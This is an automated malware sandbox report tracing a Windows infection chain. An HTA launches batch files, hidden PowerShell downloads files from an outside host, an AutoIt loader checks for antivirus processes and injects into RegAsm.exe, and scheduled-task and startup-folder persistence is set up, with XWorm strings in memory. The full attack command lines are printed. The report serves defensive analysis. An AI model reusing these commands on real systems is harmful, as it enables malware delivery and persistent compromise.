              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0104F735
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,28_2_0104FA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00894005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_00894005
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,36_2_0089C2FF
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089494A GetFileAttributesW,FindFirstFileW,FindClose,36_2_0089494A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,36_2_0089CD9F
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089CD14 FindFirstFileW,FindClose,36_2_0089CD14
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0089F5D8
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0089F735
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,36_2_0089FA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00893CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_00893CE2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FF5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,28_2_00FF5D13
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeThread delayed: delay time: 60000
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: mshta.exe, 00000000.00000002.2191819008.000000000A6C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: mshta.exe, 00000000.00000003.2180407908.000000000A6C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2191819008.000000000A6C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: mshta.exe, 00000000.00000002.2191819008.000000000A689000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178648980.000000000A686000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@Dl
              Source: RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
              Source: Carter.pif, 0000001C.00000002.4146223730.0000000003C30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifAPI call chain: ExitProcess graph end nodegraph_28-100560
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010545D5 BlockInput,28_2_010545D5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FF5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,28_2_00FF5240
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01015CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,28_2_01015CAC
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,15_2_004062FC
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010388CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,28_2_010388CD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0100A354 SetUnhandledExceptionFilter,28_2_0100A354
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0100A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0100A385
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0085A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_0085A385
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0085A354 SetUnhandledExceptionFilter,36_2_0085A354
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifMemory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: 5C0000 value starts with: 4D5A
              Writes to foreign memory regions
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifMemory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: 5C0000
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifMemory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: 626000
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01039369 LogonUserW,28_2_01039369
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FF5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,28_2_00FF5240
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01041AC6 SendInput,keybd_event,28_2_01041AC6
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010451E2 mouse_event,28_2_010451E2
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 90
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & echo url="c:\users\user\appdata\local\cloudsynergy solutions\danielpulse.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & exit
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & echo url="c:\users\user\appdata\local\cloudsynergy solutions\danielpulse.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & exit
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010388CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,28_2_010388CD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01044F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,28_2_01044F1C
              Source: msword.exe, 0000000F.00000003.2182204354.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EE3000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000000.2208287854.0000000001096000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: RegAsm.exe, 00000028.00000002.4146462832.00000000028C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: Carter.pif, DanielPulse.scrBinary or memory string: Shell_TrayWnd
              Source: RegAsm.exe, 00000028.00000002.4146462832.00000000028C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\dq@\dq'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: RegAsm.exe, 00000028.00000002.4146462832.00000000028C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $dq'PING!<Xwormmm>Program Manager<Xwormmm>0Tedq$
              Source: RegAsm.exe, 00000028.00000002.4146462832.00000000028C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: RegAsm.exe, 00000028.00000002.4146462832.00000000028C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-dq
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0100885B cpuid 28_2_0100885B
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
